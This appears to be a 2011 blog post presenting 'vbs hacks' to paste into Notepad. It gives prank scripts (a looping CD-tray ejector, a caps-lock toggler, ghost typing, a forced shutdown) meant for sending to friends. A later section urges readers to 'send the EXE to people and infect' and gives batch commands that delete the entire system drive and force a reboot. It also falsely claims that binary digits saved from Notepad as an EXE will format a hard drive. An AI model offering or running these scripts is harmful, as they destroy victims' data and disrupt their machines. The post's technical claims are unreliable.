Notepad লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
Notepad লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

The most wanted .vbs Hacks

১০/২৯/২০১১ ০৯:৩০:০০ AM | , | 0 comments »

VBScript (Visual Basic Scripting Edition) is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.This indeed is a very interesting scripting language and I will share some of the best .vbs hacks which you can use to have loads of fun.We have shared a post on this blog which uses .vbs scripting and helps toConvert text to speech on a PC without any software.You can send these to your friends too ;)

How to use the scripts provided?
To use the scripts provided in this article you need to open a new notepad,and copy-paste the code provided within the different headings.Then goto the file menu and click “save as..” .Save it in your desktop with the name “anything.vbs” .To use the script , double click on the icon on your desktop.

Make the CD tray open and close repeatedly

This code repeatedly opens and closes the cd tray. The code is :
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if
You press ctrl + alt + delete and go to processes, and end wscript.exe.
T

Turns on and off your capslock repeatedly

This will turn your caps lock on and off every tenth of a second. The code is below :
Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" 
loop
You can press ctrl + alt + delete and go to processes, and end wscript.exe.

 

Notepad Hack

This is one of my favorite hacks (is also known as ghost typing) what it does is opens a notepad and the typing starts automatically and you can change what it displays! The code is below :
Set wshshell = wscript.CreateObject("WScript.Shell") 
Wshshell.run "Notepad" 
wscript.sleep 400
wshshell.sendkeys "T"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 120
wshshell.sendkeys "c"
wscript.sleep 200
wshshell.sendkeys "h"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys "o"
wscript.sleep 50
wshshell.sendkeys "V"
wscript.sleep 120
wshshell.sendkeys "a"
wscript.sleep 150
wshshell.sendkeys "l"
wscript.sleep 170
wshshell.sendkeys "l"
wscript.sleep 200
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "y"
wscript.sleep 50
wshshell.sendkeys " "
wscript.sleep 120
wshshell.sendkeys "i"
wscript.sleep 160
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "g"
wscript.sleep 100
wshshell.sendkeys "o"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 100
wshshell.sendkeys "d"
Instrucions :
Whatever is typed is shown character-wise . You can edit it to suit your needs , just change the characters and for separating words add a space instead of a character.Nice trick for annoying users.
 

Force Shutdown a Computer

This command will force shut-down the computer after the time specified.Can come handy :-p
set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "shutdown.exe -s -t 6"
wscript.sleep 2000
To change the shutdown minutes,change the “6″ in the code!
 

Format A HDD With Notepad

৮/২৮/২০১১ ০৫:৪৮:০০ PM | , , | 0 comments »

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file